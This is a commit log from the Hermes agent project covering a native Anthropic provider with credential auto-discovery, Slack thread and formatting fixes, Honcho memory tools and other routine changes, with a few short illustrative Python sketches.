- Add tests for adaptive thinking on 4.6 and manual thinking on pre-4.6

Fixes #1126
2026-03-13 03:21:13 +01:00
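
A sketch combining this change with the Haiku guard from the commit above;
the version detection and effort mapping are simplified assumptions:

    EFFORT_MAP = {"xhigh": "max", "high": "high", "medium": "medium", "low": "low"}

    def thinking_kwargs(model: str, effort: str, budget_tokens: int) -> dict:
        if "haiku" in model:
            return {}  # Haiku: no thinking params at all
        if "4-6" in model:  # 4.6 models: adaptive, budget_tokens rejected
            return {"thinking": {"type": "adaptive"},
                    "output_config": {"effort": EFFORT_MAP.get(effort, "high")}}
        return {"thinking": {"type": "enabled", "budget_tokens": budget_tokens}}
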
Teknium
9dfa81ab4b Merge pull request #1125 from NousResearch/hermes/hermes-c877bdeb
fix(anthropic): add diagnostic output on 401 auth failures
2026-03-12 19:15:21 -07:00
teknium1
e5b8e06037 fix(anthropic): add diagnostic output on 401 auth failures
When Anthropic returns 401 and credential refresh doesn't help,
now prints actionable troubleshooting info:
- Which auth method was used (Bearer vs x-api-key)
- Token prefix for debugging
- Common fixes (stale ANTHROPIC_API_KEY, verify key, refresh login)
- How to clear stale keys
2026-03-12 19:09:06 -07:00
Teknium
a282322845 Merge pull request #1121 from 0xbyt4/fix/anthropic-adapter-issues
fix: anthropic adapter — max_tokens, fallback crash, proxy base_url
2026-03-12 19:07:06 -07:00
Teknium
475dd58a8e Merge PR #736: feat(honcho): async writes, memory modes, session title integration, setup CLI
Authored by erosika. Builds on #38 and #243.

Adds async write support, configurable memory modes, context prefetch pipeline,
4 new Honcho tools (honcho_context, honcho_profile, honcho_search, honcho_conclude),
full 'hermes honcho' CLI, session strategies, AI peer identity, recallMode A/B,
gateway lifecycle management, and comprehensive docs.

Cherry-picks fixes from PRs #831/#832 (adavyas).

Co-authored-by: erosika <erosika@users.noreply.github.com>
Co-authored-by: adavyas <adavyas@users.noreply.github.com>
2026-03-12 19:05:11 -07:00
Teknium
28ffa8e693 fix: slack file upload fallback loses thread context (#1122)
2026-03-12 18:56:27 -07:00
Teknium
e53dfd88bb Merge pull request #1123 from 0xbyt4/fix/setup-is-coding-plan-nameError
Clean fix — removes dead code that crashed with NameError on is_coding_plan. The generic _setup_provider_model_selection() already handles all affected providers.
2026-03-12 18:55:59 -07:00
0xbyt4
93c3a1a9c9 fix(setup): remove dead code causing is_coding_plan NameError crash
Remove 50 lines of unreachable duplicate model selection logic in
setup_model_provider() for zai/kimi-coding/minimax/minimax-cn providers.
The code referenced undefined `is_coding_plan` variable, crashing setup.
_setup_provider_model_selection() already handles these providers correctly
via _DEFAULT_PROVIDER_MODELS dict.
2026-03-13 04:42:26 +03:00
0xbyt4
064c66df8c fix: slack file upload fallback loses thread context
Fallback paths in send_image_file, send_video, and send_document called
super() without metadata, causing replies to appear outside the thread
when file upload fails. Use self.send() with metadata instead to preserve
thread_ts context.
2026-03-13 04:26:27 +03:00
0xbyt4
22479b053c fix: anthropic adapter — max_tokens ignored, fallback crash, proxy base_url filtered
- Pass self.max_tokens to build_anthropic_kwargs instead of hardcoded None
- Add anthropic case to _try_activate_fallback (was only handling openai-codex)
- Remove 'anthropic in base_url' filter that blocked custom proxy URLs
2026-03-13 04:22:16 +03:00
Teknium
a1c4431479 Merge pull request #1062 from NousResearch/feat/optional-rl-training
feat: make tinker-atropos RL training fully optional
2026-03-12 18:02:44 -07:00
Teknium
3bc933586a fix: Slack MAX_MESSAGE_LENGTH + typing indicator via assistant.threads.setStatus (#1117)
fix: Slack MAX_MESSAGE_LENGTH 3900 → 39000
2026-03-12 17:53:49 -07:00
Teknium
0219abfeed Merge pull request #1097 from NousResearch/hermes/hermes-c877bdeb
feat: native Anthropic provider with Claude Code credential auto-discovery
2026-03-12 17:49:39 -07:00
teknium1
e976879cf2 merge: resolve conflicts with main (URL update to hermes-agent.nousresearch.com) 2026-03-12 17:49:26 -07:00
teknium1
319e6615c3 fix: Slack MAX_MESSAGE_LENGTH + typing indicator via assistant.threads.setStatus
- Increase MAX_MESSAGE_LENGTH from 3,900 to 39,000 (Slack API allows 40k)
- Implement real typing indicator using assistant.threads.setStatus API
  - Shows 'BotName is thinking...' next to the bot name in threads
  - Auto-clears when the bot sends a reply
  - Requires assistant:write or chat:write scope
  - Falls back silently if scope unavailable (reactions still work)
- 4 new tests for typing indicator
2026-03-12 17:46:53 -07:00
teknium1
7f7282c78d fix(anthropic): guard memory flush tool_calls extraction for Anthropic response format
The memory flush path extracted tool_calls from the response assuming
OpenAI format (response.choices[0].message.tool_calls). When using
the Anthropic client directly (aux unavailable), the response is an
Anthropic Message object which has no .choices attribute. Now uses
normalize_anthropic_response() to extract tool_calls correctly.
2026-03-12 17:35:01 -07:00
teknium1
809abd60bf docs: add Anthropic provider to all documentation pages
- quickstart.md: Add Anthropic to the provider comparison table
- configuration.md: Add Anthropic to provider list table, add full
  'Anthropic (Native)' section with three auth methods (API key,
  setup-token, Claude Code auto-detect), config.yaml example,
  and provider alias tip
- environment-variables.md: Add ANTHROPIC_API_KEY, ANTHROPIC_TOKEN,
  CLAUDE_CODE_OAUTH_TOKEN to LLM Providers table; add 'anthropic'
  to HERMES_INFERENCE_PROVIDER values list
2026-03-12 17:28:36 -07:00
teknium1
aaaba78126 fix(anthropic): final polish — tool ID sanitization, crash guards, temp=1
Remaining issues from deep scan:

Adapter (agent/anthropic_adapter.py):
- Add _sanitize_tool_id() — Anthropic requires IDs matching [a-zA-Z0-9_-],
  now strips invalid chars and ensures non-empty (both tool_use and tool_result)
- Empty tool result content → '(no output)' placeholder (Anthropic rejects empty)
- Set temperature=1 when thinking type='enabled' on older models (required)
- normalize_model_name now case-insensitive for 'Anthropic/' prefix
- Fix stale docstrings referencing only ~/.claude/.credentials.json

Agent loop (run_agent.py):
- Guard memory flush path (line ~2684) — was calling self.client.chat.completions
  which is None in anthropic_messages mode. Now routes through Anthropic client.
- Guard summary generation path (line ~3171) — same crash when reaching
  iteration limit. Now builds proper Anthropic kwargs and normalizes response.
- Guard retry summary path (line ~3200) — same fix for the summary retry loop.

All three self.client.chat.completions.create() calls outside the main
loop now have anthropic_messages branches to prevent NoneType crashes.
2026-03-12 17:23:09 -07:00
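
A plausible sketch of _sanitize_tool_id(); the non-empty fallback value is
an assumption:

    import re

    def sanitize_tool_id(tool_id: str | None) -> str:
        cleaned = re.sub(r"[^a-zA-Z0-9_-]", "", tool_id or "")
        return cleaned or "tool_0"  # Anthropic rejects empty IDs
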
teknium1
4068f20ce9 fix(anthropic): deep scan fixes — auth, retries, edge cases
Fixes from comprehensive code review and cross-referencing with
clawdbot/OpenCode implementations:

CRITICAL:
- Add one-shot guard (anthropic_auth_retry_attempted) to prevent
  infinite 401 retry loops when credentials keep changing
- Fix _is_oauth_token(): managed keys from ~/.claude.json are NOT
  regular API keys (don't start with sk-ant-api). Inverted the logic:
  only sk-ant-api* is treated as API key auth, everything else uses
  Bearer auth + oauth beta headers

HIGH:
- Wrap json.loads(args) in try/except in message conversion — malformed
  tool_call arguments no longer crash the entire conversation
- Raise AuthError in runtime_provider when no Anthropic token found
  (was silently passing empty string, causing confusing API errors)
- Remove broken _try_anthropic() from auxiliary vision chain — the
  centralized router creates an OpenAI client for api_key providers
  which doesn't work with Anthropic's Messages API

MEDIUM:
- Handle empty assistant message content — Anthropic rejects empty
  content blocks, now inserts '(empty)' placeholder
- Fix setup.py existing_key logic — set to 'KEEP' sentinel instead
  of None to prevent falling through to the auth choice prompt
- Add debug logging to _fetch_anthropic_models on failure

Tests: 43 adapter tests (2 new for token detection), 3197 total passed
2026-03-12 17:14:22 -07:00
teknium1
cd4e995d54 fix(anthropic): live model fetching + adaptive thinking for 4.5+ models
- Add _fetch_anthropic_models() to hermes_cli/models.py — hits the
  Anthropic /v1/models endpoint to get the live model catalog. Handles
  both API key and OAuth token auth headers.

- Wire it into provider_model_ids() so both 'hermes model' and
  'hermes setup model' show the live list instead of a stale static one.

- Update static _PROVIDER_MODELS fallback with full current catalog:
  opus-4-6, sonnet-4-6, opus-4-5, sonnet-4-5, opus-4, sonnet-4, haiku-4-5

- Update model_metadata.py with context lengths for all current models.

- Fix thinking parameter for 4.5+ models: use type='adaptive' instead
  of type='enabled' (Anthropic deprecated 'enabled' for newer models,
  warns at runtime). Detects model version from the model name string.

Verified live:
  hermes model → Anthropic → auto-detected creds → shows 7 live models
  hermes chat --provider anthropic --model claude-opus-4-6 → works
2026-03-12 17:04:31 -07:00
teknium1
d51243b6d3 fix(anthropic): read credentials from ~/.claude.json (native binary v2.x)
The critical bug: read_claude_code_credentials() only looked at
~/.claude/.credentials.json, but Claude Code's native binary (v2.x,
Bun-compiled) stores credentials in ~/.claude.json at the top level
as 'primaryApiKey'. The .credentials.json file is only written by
older npm-based installs.

Now checks both locations in priority order:
  1. ~/.claude.json → primaryApiKey (native binary, v2.x)
  2. ~/.claude/.credentials.json → claudeAiOauth.accessToken (legacy)

Verified live: hermes model → Anthropic → auto-detected credentials →
claude-sonnet-4-20250514 → 'Hello there, how are you?' (5 words)
2026-03-12 16:43:31 -07:00
Teknium
df07baedfe feat: Slack adapter improvements — formatting, reactions, user resolution, commands (#1106)
2026-03-12 16:35:44 -07:00
teknium1
38aa47ad6c fix(anthropic): improve auth UX with clear setup-token vs API key choice
Both 'hermes model' and 'hermes setup model' now present a clear
two-option auth flow when no credentials are found:

  1. Claude Pro/Max subscription (setup-token)
     - Step-by-step instructions to run 'claude setup-token'
     - User pastes the resulting sk-ant-oat01-... token

  2. Anthropic API key (pay-per-token)
     - Link to console.anthropic.com/settings/keys
     - User pastes sk-ant-api03-... key

Also handles:
  - Auto-detection of existing Claude Code creds (~/.claude/.credentials.json)
  - Existing credentials shown with option to update
  - Consistent UX between 'hermes model' and 'hermes setup model'
2026-03-12 16:28:00 -07:00
teknium1
978e1356c0 feat: Slack adapter improvements — formatting, reactions, user resolution, commands
1. Markdown → mrkdwn conversion (format_message override):
   - **bold** → *bold*, *italic* → _italic_
   - ## Headers → *Headers* (bold)
   - [link](url) → <url|link>
   - ~~strike~~ → ~strike~
   - Code blocks and inline code preserved unchanged
   - Placeholder-based approach (same pattern as Telegram)

2. Message length splitting:
   - send() now calls format_message() + truncate_message()
   - Long responses split at natural boundaries (newlines, spaces)
   - Code blocks properly closed/reopened across chunks
   - Chunk indicators (1/N) appended for multi-part messages

3. Reaction-based acknowledgment:
   - 👀 (eyes) reaction added on message receipt
   - Replaced with ✅ (white_check_mark) when response is complete
   - Graceful error handling (missing scopes, already-reacted)
   - Serves as visual feedback since Slack has no bot typing API

4. User identity resolution:
   - Resolves Slack user IDs to display names via users.info API
   - LRU-style in-memory cache (one API call per user)
   - Fallback chain: display_name → real_name → user_id
   - user_name now included in MessageEvent source

5. Expanded slash commands (/hermes <subcommand>):
   - Added: compact, compress, resume, background, usage,
     insights, title, reasoning, provider, rollback
   - Arguments preserved (e.g. /hermes resume my session)

6. reply_broadcast config option:
   - When gateway.slack.reply_broadcast is true, first response
     in a thread also appears in the main channel
   - Disabled by default — thread = session stays clean

30 new tests covering all features.
2026-03-12 16:22:39 -07:00
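
A rough sketch of the mrkdwn rules from item 1; it skips the
placeholder-based protection of code spans and the italic rule, which need
more care than plain regex ordering:

    import re

    def to_mrkdwn(text: str) -> str:
        text = re.sub(r"\*\*(.+?)\*\*", r"*\1*", text)                # bold
        text = re.sub(r"^#{1,6}\s+(.+)$", r"*\1*", text, flags=re.M)  # headers -> bold
        text = re.sub(r"\[([^\]]+)\]\(([^)]+)\)", r"<\2|\1>", text)   # links
        text = re.sub(r"~~(.+?)~~", r"~\1~", text)                    # strikethrough
        return text
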
Teknium
39f3c0aeb0 fix: use hermes-agent.nousresearch.com as OpenRouter HTTP-Referer
* fix: stop rejecting unlisted models + auto-detect from /models endpoint

validate_requested_model() now accepts models not in the provider's API
listing with a warning instead of blocking. Removes hardcoded catalog
fallback for validation — if API is unreachable, accepts with a warning.

Model selection flows (setup + /model command) now probe the provider's
/models endpoint to get the real available models. Falls back to
hardcoded defaults with a clear warning when auto-detection fails:
'Could not auto-detect models — use Custom model if yours isn't listed.'

Z.AI setup no longer excludes GLM-5 on coding plans.

* fix: use hermes-agent.nousresearch.com as HTTP-Referer for OpenRouter

OpenRouter scrapes the favicon/logo from the HTTP-Referer URL for app
rankings. We were sending the GitHub repo URL, which gives us a generic
GitHub logo. Changed to the proper website URL so our actual branding
shows up in rankings.

Changed in run_agent.py (main agent client) and auxiliary_client.py
(vision/summarization clients).
2026-03-12 16:20:22 -07:00
teknium1
7086fde37e fix(anthropic): revert inline vision, add hermes model flow, wire vision aux
Feedback fixes:

1. Revert _convert_vision_content — vision is handled by the vision_analyze
   tool, not by converting image blocks inline in conversation messages.
   Removed the function and its tests.

2. Add Anthropic to 'hermes model' (cmd_model in main.py):
   - Added to provider_labels dict
   - Added to providers selection list
   - Added _model_flow_anthropic() with Claude Code credential auto-detection,
     API key prompting, and model selection from catalog.

3. Wire up Anthropic as a vision-capable auxiliary provider:
   - Added _try_anthropic() to auxiliary_client.py using claude-sonnet-4
     as the vision model (Claude natively supports multimodal)
   - Added to the get_vision_auxiliary_client() auto-detection chain
     (after OpenRouter/Nous, before Codex/custom)

Cache tracking note: the Anthropic cache metrics branch in run_agent.py
(cache_read_input_tokens / cache_creation_input_tokens) is in the correct
place — it's response-level parsing, same location as the existing
OpenRouter cache tracking. auxiliary_client.py has no cache tracking.
2026-03-12 16:09:04 -07:00
Teknium
4cb553c765 fix: Slack thread handling — progress messages, responses, and session isolation (#1103)
2026-03-12 16:07:05 -07:00
teknium1
987410fff3 fix: Slack thread handling — progress messages, responses, and session isolation
Three bugs fixed in the Slack adapter:

1. Tool progress messages leaked to main channel instead of thread.
   Root cause: metadata key mismatch — gateway uses 'thread_id' but
   Slack adapter checked for 'thread_ts'. Added _resolve_thread_ts()
   helper that checks both keys with correct precedence.

2. Bot responses could escape threads for replies.
   Root cause: reply_to was set to the child message's ts, but Slack
   API needs the parent message's ts for thread_ts. Now metadata
   thread_id (always the parent ts) takes priority over reply_to.

3. All Slack DMs shared one session key ('agent:main:slack:dm'),
   so a long-running task blocked all other DM conversations.
   Fix: DMs with thread_id now get per-thread session keys. Top-level
   DMs still share one session for conversation continuity.

Additional fix: All Slack media methods (send_image, send_voice,
send_video, send_document, send_image_file) now accept metadata
parameter for thread routing. Previously they only accepted reply_to,
which caused media to silently fail to post in threads.

Session key behavior after this change:
- Slack channel @mention: creates thread, thread = session
- Slack thread reply: stays in thread, same session
- Slack DM (top-level): one continuous session
- Slack DM (threaded): per-thread session
- Other platforms: unchanged
2026-03-12 16:05:45 -07:00
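
The key-precedence fix from item 1 as a sketch; _resolve_thread_ts() is
private, so the signature here is assumed:

    def resolve_thread_ts(metadata: dict | None, reply_to: str | None) -> str | None:
        md = metadata or {}
        # gateway sends 'thread_id' (always the parent ts); prefer it over
        # reply_to, which may be a child message's ts
        return md.get("thread_id") or md.get("thread_ts") or reply_to
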
Teknium
4a8cd6f856 fix: stop rejecting unlisted models, accept with warning instead
* fix: use session_key instead of chat_id for adapter interrupt lookups

monitor_for_interrupt() in _run_agent was using source.chat_id to query
the adapter's has_pending_interrupt() and get_pending_message() methods.
But the adapter stores interrupt events under build_session_key(source),
which produces a different string (e.g. 'agent:main:telegram:dm' vs '123456').

This key mismatch meant the interrupt was never detected through the
adapter path, which is the only active interrupt path for all adapter-based
platforms (Telegram, Discord, Slack, etc.). The gateway-level interrupt
path (in dispatch_message) is unreachable because the adapter intercepts
the 2nd message in handle_message() before it reaches dispatch_message().

Result: sending a new message while subagents were running had no effect —
the interrupt was silently lost.

Fix: replace all source.chat_id references in the interrupt-related code
within _run_agent() with the session_key parameter, which matches the
adapter's storage keys.

Also adds regression tests verifying session_key vs chat_id consistency.

* debug: add file-based logging to CLI interrupt path

Temporary instrumentation to diagnose why message-based interrupts
don't seem to work during subagent execution. Logs to
~/.hermes/interrupt_debug.log (immune to redirect_stdout).

Two log points:
1. When Enter handler puts message into _interrupt_queue
2. When chat() reads it and calls agent.interrupt()

This will reveal whether the message reaches the queue and
whether the interrupt is actually fired.

* fix: accept unlisted models with warning instead of rejecting

validate_requested_model() previously hard-rejected any model not found
in the provider's API listing. This was too aggressive — users on higher
plan tiers (e.g. Z.AI Pro/Max) may have access to models not shown in
the public listing (like glm-5 on coding endpoints).

Changes:
- validate_requested_model: accept unlisted models with a warning note
  instead of blocking. The model is saved to config and used immediately.
- Z.AI setup: always offer glm-5 in the model list regardless of whether
  a coding endpoint was detected. Pro/Max plans support it.
- Z.AI setup detection message: softened from 'GLM-5 is not available'
  to 'GLM-5 may still be available depending on your plan tier'
2026-03-12 16:02:35 -07:00
teknium1
d7adfe8f61 fix(anthropic): address gaps found in deep-dive audit
After studying clawdbot (OpenClaw) and OpenCode implementations:

## Beta headers
- Add interleaved-thinking-2025-05-14 and fine-grained-tool-streaming-2025-05-14
  as common betas (sent with ALL auth types, not just OAuth)
- OAuth tokens additionally get oauth-2025-04-20
- API keys now also get the common betas (previously got none)

## Vision/image support
- Add _convert_vision_content() to convert OpenAI multimodal format
  (image_url blocks) to Anthropic format (image blocks with base64/url source)
- Handles both data: URIs (base64) and regular URLs

## Role alternation enforcement
- Anthropic strictly rejects consecutive same-role messages (400 error)
- Add post-processing step that merges consecutive user/assistant messages
- Handles string, list, and mixed content types during merge

## Tool choice support
- Add tool_choice parameter to build_anthropic_kwargs()
- Maps OpenAI values: auto→auto, required→any, none→omit, name→tool

## Cache metrics tracking
- Anthropic uses cache_read_input_tokens / cache_creation_input_tokens
  (different from OpenRouter's prompt_tokens_details.cached_tokens)
- Add api_mode-aware branch in run_agent.py cache stats logging

## Credential refresh on 401
- On 401 error during anthropic_messages mode, re-read credentials
  via resolve_anthropic_token() (picks up refreshed Claude Code tokens)
- Rebuild client if new token differs from current one
- Follows same pattern as Codex/Nous 401 refresh handlers

## Tests
- 44 adapter tests (8 new: vision conversion, role alternation, tool choice)
- Updated beta header tests to verify new structure
- Full suite: 3198 passed, 0 regressions
2026-03-12 16:00:46 -07:00
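
The role-alternation merge as a sketch for string content only; the real
post-processing step also handles list and mixed content types:

    def merge_consecutive_roles(messages: list[dict]) -> list[dict]:
        merged: list[dict] = []
        for m in messages:
            if (merged and m["role"] in ("user", "assistant")
                    and merged[-1]["role"] == m["role"]):
                prev = merged[-1]  # merge into previous same-role message
                merged[-1] = {**prev, "content": f"{prev['content']}\n{m['content']}"}
            else:
                merged.append(dict(m))
        return merged
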
Teknium
def7b84a12 Merge pull request #1098 from NousResearch/hermes/hermes-465f3702
fix: eliminate execute_code progress spam on gateway platforms
2026-03-12 15:55:02 -07:00
teknium1
8121aef83c fix: eliminate execute_code progress spam on gateway platforms
Root cause: two issues combined to create visual spam on Telegram/Discord:

1. build_tool_preview() preserved newlines from tool arguments. A preview
   like 'import os\nprint("...")' rendered as 2+ visual lines per
   progress entry on messaging platforms. This affected execute_code most
   (code always has newlines), but could also hit terminal, memory,
   send_message, session_search, and process tools.

2. No deduplication of identical progress messages. When models iterate
   with execute_code using the same boilerplate code (common pattern),
   each call produced an identical progress line. 9 calls x 2 visual
   lines = 18 lines of identical spam in one message bubble.

Fixes:
- Added _oneline() helper to collapse all whitespace (newlines, tabs) to
  single spaces. Applied to ALL code paths in build_tool_preview() —
  both the generic path and every early-return path that touches user
  content (memory, session_search, send_message, process).
- Added dedup in gateway progress_callback: consecutive identical messages
  are collapsed with a repeat counter, e.g. 'execute_code: ... (x9)'
  instead of 9 identical lines. The send_progress_messages async loop
  handles dedup tuples by updating the last progress_line in-place.
2026-03-12 15:53:02 -07:00
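
A minimal sketch of the _oneline() helper; the length limit is an
assumption:

    def oneline(text: str, limit: int = 120) -> str:
        collapsed = " ".join(text.split())  # newlines/tabs/runs -> single spaces
        return collapsed if len(collapsed) <= limit else collapsed[:limit - 1] + "…"
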
Teknium
1bb8ed4495 chore: lower default compression threshold from 85% to 50% (#1096)
* fix: ClawHub skill install — use /download ZIP endpoint

The ClawHub API v1 version endpoint only returns file metadata
(path, size, sha256, contentType) without inline content or download
URLs. Our code was looking for inline content in the metadata, which
never existed, causing all ClawHub installs to fail with:
'no inline/raw file content was available'

Fix: Use the /api/v1/download endpoint (same as the official clawhub
CLI) to download skills as ZIP bundles and extract files in-memory.

Changes:
- Add _download_zip() method that downloads and extracts ZIP bundles
- Retry on 429 rate limiting with Retry-After header support
- Path sanitization and binary file filtering for security
- Keep _extract_files() as a fallback for inline/raw content
- Also fix nested file lookup (version_data.version.files)

* chore: lower default compression threshold from 85% to 50%

Triggers context compression earlier — at 50% of the model's context
window instead of 85%. Updated in all five places where the default
is defined: context_compressor.py, cli.py, run_agent.py, config.py,
and gateway/run.py.
2026-03-12 15:51:50 -07:00
teknium1
5e12442b4b feat: native Anthropic provider with Claude Code credential auto-discovery
Add Anthropic as a first-class inference provider, bypassing OpenRouter
for direct API access. Uses the native Anthropic SDK with a full format
adapter (same pattern as the codex_responses api_mode).

## Auth (three methods, priority order)
1. ANTHROPIC_API_KEY env var (regular API key, sk-ant-api-*)
2. ANTHROPIC_TOKEN / CLAUDE_CODE_OAUTH_TOKEN env var (setup-token, sk-ant-oat-*)
3. Auto-discovery from ~/.claude/.credentials.json (Claude Code subscription)
   - Reads Claude Code's OAuth credentials
   - Checks token expiry with 60s buffer
   - Setup tokens use Bearer auth + anthropic-beta: oauth-2025-04-20 header
   - Regular API keys use standard x-api-key header

## Changes by file

### New files
- agent/anthropic_adapter.py — Client builder, message/tool/response
  format conversion, Claude Code credential reader, token resolver.
  Handles system prompt extraction, tool_use/tool_result blocks,
  thinking/reasoning, orphaned tool_use cleanup, cache_control.
- tests/test_anthropic_adapter.py — 36 tests covering all adapter logic

### Modified files
- pyproject.toml — Add anthropic>=0.39.0 dependency
- hermes_cli/auth.py — Add 'anthropic' to PROVIDER_REGISTRY with
  three env vars, plus 'claude'/'claude-code' aliases
- hermes_cli/models.py — Add model catalog, labels, aliases, provider order
- hermes_cli/main.py — Add 'anthropic' to --provider CLI choices
- hermes_cli/runtime_provider.py — Add Anthropic branch returning
  api_mode='anthropic_messages' (before generic api_key fallthrough)
- hermes_cli/setup.py — Add Anthropic setup wizard with Claude Code
  credential auto-discovery, model selection, OpenRouter tools prompt
- agent/auxiliary_client.py — Add claude-haiku-4-5 as aux model
- agent/model_metadata.py — Add bare Claude model context lengths
- run_agent.py — Add anthropic_messages api_mode:
  * Client init (Anthropic SDK instead of OpenAI)
  * API call dispatch (_anthropic_client.messages.create)
  * Response validation (content blocks)
  * finish_reason mapping (stop_reason -> finish_reason)
  * Token usage (input_tokens/output_tokens)
  * Response normalization (normalize_anthropic_response)
  * Client interrupt/rebuild
  * Prompt caching auto-enabled for native Anthropic
- tests/test_run_agent.py — Update test_anthropic_base_url_accepted to
  expect native routing, add test_prompt_caching_native_anthropic
2026-03-12 15:47:45 -07:00
Erosika
fefc709b2c merge: resolve conflict with main in subagent interrupt test 2026-03-12 16:28:57 -04:00
Erosika
45d3e83ad1 fix(honcho): normalize legacy recallMode values like 'auto' to 'hybrid' 2026-03-12 16:27:49 -04:00
Erosika
0aed9bfde1 refactor(honcho): rename memory tools to Honcho tools, clarify recall mode language
Replace "memory tools" with "Honcho tools" and "pre-warmed/prefetch"
with "auto-injected context" in all user-facing strings and docs.
2026-03-12 16:26:10 -04:00
Erosika
ae2a5e5743 refactor(honcho): remove local memory mode
The "local" memoryMode was redundant with enabled: false. Simplifies
the mode system to hybrid and honcho only.
2026-03-12 16:23:34 -04:00
Erosika
f896bb5d8c fix(test): patch correct method in subagent interrupt test
build_system_prompt was refactored to AIAgent._build_system_prompt
but the test still patched the non-existent module-level function.
2026-03-12 15:05:42 -04:00
Erosika
cd6e5e44e4 feat(honcho): show clickable session line on CLI startup
Display a one-line Honcho session indicator with an OSC 8 terminal
hyperlink after the banner. Also shown when /title remaps the session.
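
For reference, the OSC 8 sequence that makes a terminal line clickable
(sketch with a made-up URL, not the exact Hermes output):

  def osc8_link(url: str, label: str) -> str:
      # ESC ] 8 ; ; URI ESC \ opens the link, ESC ] 8 ; ; ESC \ closes it
      return f"\x1b]8;;{url}\x1b\\{label}\x1b]8;;\x1b\\"

  print("Honcho session: " + osc8_link("https://example.com/session/abc123", "abc123"))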
2026-03-12 12:30:42 -04:00
teknium1
47e49da77c feat: make tinker-atropos RL training fully optional
The tinker-atropos submodule and its heavy dependencies (atroposlib, tinker,
wandb, fastapi, uvicorn) were being installed for all users by default,
adding significant install time and disk usage for most users who don't
need RL training capabilities.

Changes:
- install.sh: Only init mini-swe-agent submodule by default; skip
  tinker-atropos clone and install entirely
- install.sh: Remove --recurse-submodules from git clone (only fetches
  what's needed)
- pyproject.toml: Add [rl] optional dependency group for explicit opt-in
- rl_training_tool.py: Move LOGS_DIR.mkdir() from module-level to lazy
  init (_ensure_logs_dir) to avoid side effects on import
- README.md: Update contributor quick start to not auto-fetch
  tinker-atropos; add RL opt-in instructions

Users who want RL training can opt in with:
  git submodule update --init tinker-atropos
  uv pip install -e ./tinker-atropos
2026-03-12 09:11:44 -07:00
Teknium
e004c094ea fix: use session_key instead of chat_id for adapter interrupt lookups
* fix: use session_key instead of chat_id for adapter interrupt lookups

monitor_for_interrupt() in _run_agent was using source.chat_id to query
the adapter's has_pending_interrupt() and get_pending_message() methods.
But the adapter stores interrupt events under build_session_key(source),
which produces a different string (e.g. 'agent:main:telegram:dm' vs '123456').

This key mismatch meant the interrupt was never detected through the
adapter path, which is the only active interrupt path for all adapter-based
platforms (Telegram, Discord, Slack, etc.). The gateway-level interrupt
path (in dispatch_message) is unreachable because the adapter intercepts
the 2nd message in handle_message() before it reaches dispatch_message().

Result: sending a new message while subagents were running had no effect —
the interrupt was silently lost.

Fix: replace all source.chat_id references in the interrupt-related code
within _run_agent() with the session_key parameter, which matches the
adapter's storage keys.

Also adds regression tests verifying session_key vs chat_id consistency.
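
The shape of the mismatch, reduced to a runnable sketch (simplified
build_session_key; the real keys carry more scope):

  def build_session_key(source: dict) -> str:
      # simplified: the real helper also scopes by agent name
      return f"agent:main:{source['platform']}:{source['chat_type']}"

  source = {"platform": "telegram", "chat_type": "dm", "chat_id": "123456"}
  pending = {build_session_key(source): "interrupt-event"}

  print(pending.get(source["chat_id"]))          # None -> interrupt lost (old bug)
  print(pending.get(build_session_key(source)))  # 'interrupt-event' (fixed lookup)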

* debug: add file-based logging to CLI interrupt path

Temporary instrumentation to diagnose why message-based interrupts
don't seem to work during subagent execution. Logs to
~/.hermes/interrupt_debug.log (immune to redirect_stdout).

Two log points:
1. When Enter handler puts message into _interrupt_queue
2. When chat() reads it and calls agent.interrupt()

This will reveal whether the message reaches the queue and
whether the interrupt is actually fired.
2026-03-12 08:35:45 -07:00
Teknium
5c54128475 fix: ClawHub skill install — use /download ZIP endpoint (#1060)
The ClawHub API v1 version endpoint only returns file metadata
(path, size, sha256, contentType) without inline content or download
URLs. Our code was looking for inline content in the metadata, which
never existed, causing all ClawHub installs to fail with:
'no inline/raw file content was available'

Fix: Use the /api/v1/download endpoint (same as the official clawhub
CLI) to download skills as ZIP bundles and extract files in-memory.

Changes:
- Add _download_zip() method that downloads and extracts ZIP bundles
- Retry on 429 rate limiting with Retry-After header support
- Path sanitization and binary file filtering for security
- Keep _extract_files() as a fallback for inline/raw content
- Also fix nested file lookup (version_data.version.files)
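
A minimal sketch of the ZIP path, assuming the requests library; the
method name and retry shape follow this description rather than the
exact implementation:

  import io, time, zipfile
  import requests

  def _download_zip(url: str, max_retries: int = 3) -> dict:
      for attempt in range(max_retries):
          resp = requests.get(url, timeout=30)
          if resp.status_code == 429:
              # rate limited: honor Retry-After, then retry
              time.sleep(int(resp.headers.get("Retry-After", 2 ** attempt)))
              continue
          resp.raise_for_status()
          files = {}
          with zipfile.ZipFile(io.BytesIO(resp.content)) as zf:
              for name in zf.namelist():
                  # skip absolute/traversal paths and directories
                  if name.startswith(("/", "..")) or name.endswith("/"):
                      continue
                  files[name] = zf.read(name)
          return files
      raise RuntimeError("still rate limited after retries")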
2026-03-12 08:26:24 -07:00
Teknium
42cf66ae39 feat: add 'hermes claw migrate' command + migration docs (#1059)
feat: add 'hermes claw migrate' command + migration docs
2026-03-12 08:23:05 -07:00
Teknium
73ea5102dc Merge pull request #1058 from NousResearch/hermes/hermes-465f3702
fix: strip call_id/response_item_id from tool_calls for Mistral compatibility
2026-03-12 08:21:36 -07:00
teknium1
d53035ad82 feat: add 'hermes claw migrate' command + migration docs
- Add hermes_cli/claw.py with full CLI migration handler:
  - hermes claw migrate (interactive migration with confirmation)
  - --dry-run, --preset, --overwrite, --skill-conflict flags
  - --source for custom OpenClaw path
  - --yes to skip confirmation
  - Clean formatted output matching setup wizard style

- Fix Python 3.11+ @dataclass compatibility bug in dynamic module loading:
  - Register module in sys.modules before exec_module()
  - Fixes both setup.py (PR #981) and new claw.py

- Add 16 tests in tests/hermes_cli/test_claw.py covering:
  - Script discovery (project root, installed, missing)
  - Command routing
  - Dry-run, execute, cancellation, error handling
  - Preset/secrets behavior, report formatting

- Documentation updates:
  - README.md: Add 'hermes claw migrate' to Getting Started, new Migration section
  - docs/migration/openclaw.md: Full migration guide with all options
  - SKILL.md: Add CLI Command section at top of openclaw-migration skill
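
The sys.modules fix from the second bullet is the standard importlib
pattern, sketched:

  import importlib.util
  import sys

  def load_module_from_path(name: str, path: str):
      spec = importlib.util.spec_from_file_location(name, path)
      module = importlib.util.module_from_spec(spec)
      # register BEFORE exec_module: on Python 3.11+, @dataclass
      # resolves the defining module through sys.modules while the
      # class body executes, and fails if it isn't registered yet
      sys.modules[name] = module
      spec.loader.exec_module(module)
      return module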
2026-03-12 08:20:12 -07:00
Teknium
5a4348d046 Merge pull request #1053 from NousResearch/hermes/hermes-c877bdeb
